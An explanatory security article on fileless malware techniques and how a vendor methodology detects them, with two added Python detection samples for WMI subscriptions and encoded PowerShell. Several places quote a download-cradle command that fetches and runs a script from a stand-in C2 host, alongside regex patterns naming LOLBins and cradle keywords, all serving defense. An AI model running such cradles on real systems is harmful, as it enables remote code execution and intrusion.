# Fileless Malware
Fileless malware is malicious code that executes entirely in memory without writing a payload file to the target's disk. Traditional antivirus operates on a simple model: scan files on the file system and compare them against known malicious signatures. Fileless malware breaks this model at its foundation. There is no file to scan. The malicious logic exists as code injected into a running process, as an encoded value stored in the Windows registry, as a WMI event subscription buried in a system database, or as a script executed by a trusted interpreter. The file system is untouched.
The term "fileless" is somewhat imprecise and is better understood as a spectrum. At one end is fully memory-resident malware that never touches the disk in any form. At the other end are attacks that use legitimate files (already on the system) as execution vehicles for malicious logic received from the network. What unites the spectrum is the absence of a dropped executable: no foreign binary file, no unique hash, no quarantine target.
Fileless techniques are not new. They have been present in sophisticated attack toolkits since at least 2014. What has changed is their prevalence. Nation-state actors and ransomware operators now treat fileless execution as a standard operational requirement. According to CrowdStrike threat intelligence, the majority of successful intrusions by tracked adversary groups involve some fileless component. The technique has migrated from elite APT operations to commodity ransomware affiliates because the tools that enable it (Cobalt Strike, PowerShell Empire, Metasploit's Meterpreter) are widely available.
The defensive implication is critical: if an organization's endpoint security relies primarily on antivirus with file scanning, fileless malware operates without meaningful constraint. Detection requires a fundamentally different set of tools and a fundamentally different detection philosophy.
The most technically sophisticated fileless technique is direct injection of code into a legitimate running process. The malicious code executes inside a trusted process and is never written to disk.
Reflective DLL injection is the technique underlying Cobalt Strike Beacon, the most widely deployed post-exploitation framework in use today. A DLL (Dynamic Link Library) file is the normal Windows mechanism for loading shared code into process memory. Standard DLL loading requires the file to exist on disk. Reflective DLL injection bypasses this requirement: the DLL contains its own loader function that maps the DLL into memory without involving the Windows loader and without requiring a file write. The DLL is received as shellcode from a network source or constructed in memory, and it loads itself. The result is a fully functional DLL executing inside a legitimate process (explorer.exe, svchost.exe, notepad.exe) with no corresponding file on disk.
Cobalt Strike's Beacon payload uses reflective DLL injection as its default execution mechanism. When a Cobalt Strike Beacon is deployed against a target, the payload is received over the network, loaded into memory via reflective injection, and begins communicating with the attacker's command-and-control infrastructure, all without touching the file system. This is why Cobalt Strike detections require behavioral analysis rather than file scanning.
Shellcode injection follows a similar pattern without the DLL structure. Raw machine code is written into a memory region of a target process and executed. The VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread Windows API sequence is the classic injection chain: allocate memory in the target process, write shellcode into that memory, and create a thread to execute it. Metasploit's Meterpreter uses this approach. The resulting payload executes inside the target process with that process's privileges and identity, while generating no file system artifacts.
Process hollowing takes an additional step: a legitimate process is started in a suspended state, its memory is replaced with malicious code, and execution resumes. From the operating system's perspective and from the user's perspective, the process appears legitimate. From the attacker's perspective, the malicious code now runs inside a process that has legitimate credentials, legitimate network connections, and a legitimate name in the process list.
Scripts are not executables. They are text, interpreted at runtime by legitimate scripting engines that ship with Windows. PowerShell, VBScript, and JScript all interpret and execute code without requiring a compiled binary.
The canonical fileless PowerShell pattern is the download cradle: `IEX(New-Object Net.WebClient).DownloadString('http://[C2]/payload.ps1')`. This command fetches a script from an attacker-controlled server and executes it directly in memory using Invoke-Expression (IEX). The script is downloaded into a string variable, never serialized to disk, and executed immediately. Sophisticated variants add obfuscation: variable substitution, character replacement, compression, and encoding to complicate static analysis of the command line.
PowerShell Empire, an open-source post-exploitation framework, operates almost entirely through PowerShell without writing files. Empire agents are PowerShell scripts that execute in memory and communicate with the Empire server over HTTP or HTTPS. The agent persists through registry Run keys or scheduled tasks that execute a PowerShell download cradle at system startup, but the agent itself never writes to disk.
The Windows registry is a configuration database. It is not generally considered a code execution location. Attackers have exploited this assumption by storing malicious code in registry values.
The pattern is: encode a PowerShell script or shellcode as Base64 and store it in a registry value. Then create a persistence mechanism (a scheduled task or Run key) that reads the registry value and executes it using a LOLBin. At startup or login, the system reads the registry value, decodes it, and executes the payload. No executable file is involved in the persistence or execution chain.
This approach stores the payload in the registry (or, as described next, in the WMI repository). Both are database files rather than executable files. Antivirus file scanning does not analyze registry values for malicious code. The payload persists across reboots and survives file system scans with no detection.
WMI event subscriptions are the most persistent and most difficult to detect fileless persistence mechanism. WMI subscriptions consist of three components stored in the WMI repository (a database file at C:\Windows\System32\wbem\Repository): an event filter (__EventFilter) that defines the trigger condition as a WQL query, an event consumer (such as CommandLineEventConsumer or ActiveScriptEventConsumer) that defines the action to take, and a __FilterToConsumerBinding that links the filter to the consumer.
Once these three components are created, the WMI subscription is active and persists across reboots. The subscription is stored in the WMI repository database, not as a standalone executable. Standard file system scans do not examine the WMI repository for malicious subscriptions. The attacker can create a WMI subscription that executes a PowerShell download cradle at every system startup, establishing persistent command-and-control without any file-based artifact.
APT groups including APT29 (Cozy Bear) and FIN7 have used WMI subscriptions as persistence mechanisms in high-priority intrusions precisely because of this detection difficulty.
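Sysmon records WMI subscription creation as Event ID 19 (filter), 20 (consumer) and 21 (binding), which is the log source the WMI subscription detection above depends on. The following is an added example, not code from the article or from CDA's rule library: it correlates the three components from constructed Sysmon records (field names simplified here) and explains why a binding is suspicious. The system-uptime query is the usual way a subscription is made to fire shortly after boot; Windows' own "SCM Event Log" subscription is included as a benign control.

```python
import re
from typing import Dict, List

# Constructed Sysmon records (not real telemetry), with field names simplified:
# Event ID 19 = WmiEventFilter, 20 = WmiEventConsumer, 21 = WmiEventConsumerToFilter.
SAMPLE_EVENTS = [
    {"id": 19, "Name": "BootFilter",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "
              "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240"},
    {"id": 20, "Name": "BootConsumer", "Type": "Command Line",
     "Destination": "powershell.exe -nop -w hidden -c \"IEX(New-Object Net.WebClient)"
                    ".DownloadString('http://[C2]/payload.ps1')\""},
    {"id": 21, "Consumer": 'CommandLineEventConsumer.Name="BootConsumer"',
     "Filter": '__EventFilter.Name="BootFilter"'},
    # Windows' own default subscription in root\subscription, kept as a benign control.
    {"id": 19, "Name": "SCM Event Log Filter", "Query": "select * from MSFT_SCMEventLogEvent"},
    {"id": 20, "Name": "SCM Event Log Consumer", "Type": "Event Log", "Destination": "Application"},
    {"id": 21, "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '__EventFilter.Name="SCM Event Log Filter"'},
]

INTERPRETER = re.compile(r"(?i)powershell|pwsh|cmd\.exe|mshta|wscript|cscript|rundll32|regsvr32")
CRADLE = re.compile(r"(?i)\biex\b|invoke-expression|downloadstring|frombase64string")
NAME_IN_PATH = re.compile(r'Name="([^"]+)"')

def correlate_subscriptions(events: List[Dict]) -> List[Dict]:
    """Join each binding (21) to its filter (19) and consumer (20) and explain suspicion."""
    filters = {e["Name"]: e for e in events if e["id"] == 19}
    consumers = {e["Name"]: e for e in events if e["id"] == 20}
    findings = []
    for binding in (e for e in events if e["id"] == 21):
        cname = NAME_IN_PATH.search(binding["Consumer"]).group(1)
        fname = NAME_IN_PATH.search(binding["Filter"]).group(1)
        consumer, flt = consumers.get(cname, {}), filters.get(fname, {})
        action = consumer.get("Destination", "")
        reasons = []
        if consumer.get("Type") in ("Command Line", "Active Script"):
            reasons.append("consumer executes a command line or script")
        if INTERPRETER.search(action):
            reasons.append("consumer launches a script interpreter or LOLBin")
        if CRADLE.search(action):
            reasons.append("consumer action contains a download cradle")
        if "SystemUpTime" in flt.get("Query", ""):
            reasons.append("filter fires on system uptime, i.e. shortly after boot")
        if not consumer or not flt:
            reasons.append("binding references a filter/consumer with no creation event")
        findings.append({"filter": fname, "consumer": cname,
                         "suspicious": bool(reasons), "reasons": reasons})
    return findings
```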
Living-off-the-land binaries (LOLBins) serve as the execution layer for fileless payloads received from the network. rundll32, mshta, regsvr32, and similar tools receive malicious code from URLs and execute it without writing the payload to disk. The tool reads the content from the network, passes it to the appropriate interpreter, and executes it in memory.
This completes the fileless chain: the payload lives on the attacker's server. The LOLBin fetches and executes it. The execution happens in memory. Nothing foreign ever touches the disk. (See: Living Off the Land Techniques for detailed LOLBin analysis.)
Cobalt Strike Beacon is the most widely observed post-exploitation tool in confirmed intrusions. It is used by nation-state actors (APT10, APT41, APT29), ransomware groups (LockBit, BlackCat, Cl0p affiliates), and criminal threat actors. Its default deployment is fully fileless through reflective DLL injection.
Astaroth (also known as Guildma) is a Brazilian banking trojan notable for its fully fileless delivery chain. Astaroth arrives via email with a malicious link. The download chain uses BITSAdmin, wmic, certutil, and regsvr32 to download, decode, and inject the final payload entirely through LOLBins and in-memory execution. No malware binary ever touches the disk. Every step uses built-in Windows tools.
Sorebrect is a ransomware family that injects its encryption routine into a legitimate system process (svchost.exe) rather than running as a standalone executable. The ransomware binary triggers the injection, then deletes itself. The encryption operation occurs entirely within the injected code. By the time defenders are alerted to file encryption, the binary that triggered the attack no longer exists.
PowerShell Empire agents operate as entirely in-memory PowerShell processes with no file-based component beyond the initial persistence stager, which itself is often a registry Run key containing a download cradle.
The business case for fileless malware is simple: it defeats the most universally deployed endpoint control without requiring any special capability. Antivirus market penetration is near-universal. Every Windows enterprise environment has antivirus. And antivirus, in its traditional form, provides no meaningful detection capability against fileless attack chains.
This does not mean antivirus has no value. It eliminates commodity threats that use naive file-based delivery. But for any attacker willing to invest in fileless techniques (and Cobalt Strike's widespread availability has made this investment trivial), antivirus is not a meaningful obstacle.
The implication for security program investment is significant. Organizations that rely on antivirus as their primary endpoint control and do not have EDR with behavioral detection and memory inspection are operating with a detection gap against the majority of sophisticated intrusions.
Fileless malware makes EDR (Endpoint Detection and Response) the mandatory endpoint control for organizations that face capable adversaries. This is not a vendor claim. It is a logical consequence of the attack mechanics.
EDR platforms with behavioral detection and memory inspection can detect fileless attacks in ways antivirus cannot:
Organizations without EDR have no reliable mechanism to detect fileless attacks in progress. Organizations with EDR but without behavioral rules tuned for fileless patterns have coverage gaps that a competent attacker can exploit.
Fileless attacks extend dwell time. If the attack produces no file artifacts and no signature detections, the alert that would prompt investigation never fires. The attacker operates for days, weeks, or months within the network. Mandiant M-Trends data shows that organizations without behavioral detection capabilities have significantly longer dwell times than those with mature behavioral detection.
Extended dwell time means extended opportunity for data exfiltration, lateral movement, and escalation. A fileless attacker with extended dwell time can exfiltrate far more data, compromise far more systems, and establish far more persistence mechanisms than an attacker detected and evicted quickly.
CDA is explicit about the domain structure for fileless defense: both SPH (Security Posture and Hygiene) and TID (Threat Intelligence and Defense) are required. Neither alone is sufficient.
SPH, the terrain layer, provides the configuration baseline that makes fileless attacks visible. CDA's Autonomous Posture Command (APC) methodology treats the following as hardening requirements, not optional configurations:
Without these controls, SPH-B02 (endpoint hardening and logging) is incomplete, and the log sources that TID depends on do not exist.
TID, the atmosphere layer, provides the detection capability that interprets these logs and generates alerts. CDA's Predictive Defense Intelligence (PDI) methodology drives the detection rule library. For fileless malware, the relevant detection logic includes:
Mission TID-B01 (SIEM deployment with detection rule library) includes fileless-specific detection rules as a deployment requirement. Mission TID-H01 (detection rule tuning) addresses the false positive reduction required in PowerShell Script Block Logging environments, where legitimate administrative activity generates significant volume.
CDA's mission dependency model is explicit about the SPH-to-TID relationship. SPH-B02 enables TID-B01. Script Block Logging (SPH) enables PowerShell behavioral detection (TID). Sysmon deployment (SPH) enables process injection detection (TID). WMI activity logging (SPH) enables WMI subscription detection (TID).
An organization that deploys TID-B01 detection rules without completing SPH-B02 endpoint hardening will have detection rules that query log sources that do not produce data. The rules will never fire because the events they look for are never generated. This is not a TID failure. It is an SPH failure that manifests as a TID gap.
Mission TID-H01 (detection tuning) and TID-D01 (threat hunting) both presuppose that SPH-B02 is complete. Threat hunting for fileless malware using the hypothesis "search for PowerShell with encoded commands" requires that Script Block Logging is enabled and sending to the SIEM. Without it, the hunt produces no results regardless of whether fileless malware is present.
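A minimal version of the "PowerShell with encoded commands" hunt described here, scored against the download-cradle indicators from the script-based section earlier in the article. This is an added example, not CDA's detection rule library or any vendor's code; the event dictionaries are constructed stand-ins for Sysmon Event ID 1 command lines and PowerShell 4104 script blocks, and the threshold of two indicators is an assumption to tune per environment.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed sample events (not real telemetry): a Sysmon Event ID 1 command line
# carrying an -EncodedCommand payload, a 4104 script block with a cradle, and a benign block.
CRADLE = "IEX(New-Object Net.WebClient).DownloadString('http://[C2]/payload.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": 1, "cmd": f"powershell.exe -nop -w hidden -EncodedCommand {ENCODED}"},
    {"id": 4104, "script": "$c=New-Object Net.WebClient;iex $c.DownloadString('http://[C2]/a.ps1')"},
    {"id": 4104, "script": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
]

# Indicators that together characterise a download cradle; any two trigger an alert.
CRADLE_PATTERNS = [
    r"(?i)\b(iex|invoke-expression)\b",
    r"(?i)downloadstring|downloadfile|downloaddata",
    r"(?i)net\.webclient|invoke-webrequest|\biwr\b",
    r"(?i)frombase64string",
]
# -e, -enc, -ec and -EncodedCommand all accept a Base64 blob of UTF-16LE script.
ENC_FLAG = re.compile(r"(?i)-e(nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})")

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def cradle_indicators(text: str) -> List[str]:
    """Patterns from CRADLE_PATTERNS that match the script or command line."""
    return [p for p in CRADLE_PATTERNS if re.search(p, text)]

def triage_event(event: Dict) -> Dict:
    """Score one event; encoded command lines are decoded before scoring."""
    text = event.get("script") or event.get("cmd", "")
    decoded = decode_encoded_command(text) if event["id"] == 1 else None
    hits = cradle_indicators(decoded or text)
    if decoded is not None:
        hits.append("encodedcommand")  # the encoding itself is an indicator
    return {"id": event["id"], "decoded": decoded, "hits": len(hits),
            "alert": len(hits) >= 2}
```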
The Shield assessment scores SPH and TID segment coverage for endpoint logging and behavioral detection. Organizations with red or amber SPH segments in the endpoint hardening area cannot achieve green TID segments in behavioral detection. The segments are causally linked. The visualization makes this dependency legible to executive leadership in a way that a 90-page assessment report does not.
In PDM terms, fileless malware is executed by Beasts (malware) that use fileless techniques to traverse the terrain (SPH) invisibly. The Beasts are not roaming visibly through the terrain. They are living inside legitimate terrain structures, indistinguishable from the environment. Standard terrain patrol (antivirus scanning) cannot find them. Only behavioral sensors (EDR, SIEM with behavioral rules) can detect their presence by observing anomalous activity patterns rather than anomalous file system artifacts.
Nation-state Aliens (APT groups) use fileless techniques delivered through Beasts (Cobalt Strike, Meterpreter) controlled from beyond the atmosphere. The atmosphere (TID) must detect the behavioral indicators because the terrain (SPH) cannot detect the file-based artifacts (there are none). This is why CDA treats EDR as a TID-feeding terrain sensor rather than a standalone antivirus replacement.
MITRE ATT&CK. "Fileless Storage (T1027.011), Process Injection (T1055), Event Triggered Execution: Windows Management Instrumentation Event Subscription (T1546.003)." MITRE Corporation, 2024. https://attack.mitre.org/
CrowdStrike. "2024 Global Threat Report." CrowdStrike, 2024. https://www.crowdstrike.com/global-threat-report/
Microsoft. "Sysmon v15 Configuration Reference." Microsoft Sysinternals, 2024. https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
Microsoft. "Antimalware Scan Interface (AMSI) Documentation." Microsoft, 2024. https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
CDA, LLC. "Autonomous Posture Command (APC) Methodology Reference." CDA Canon, 2026.
Written by Evan Morgan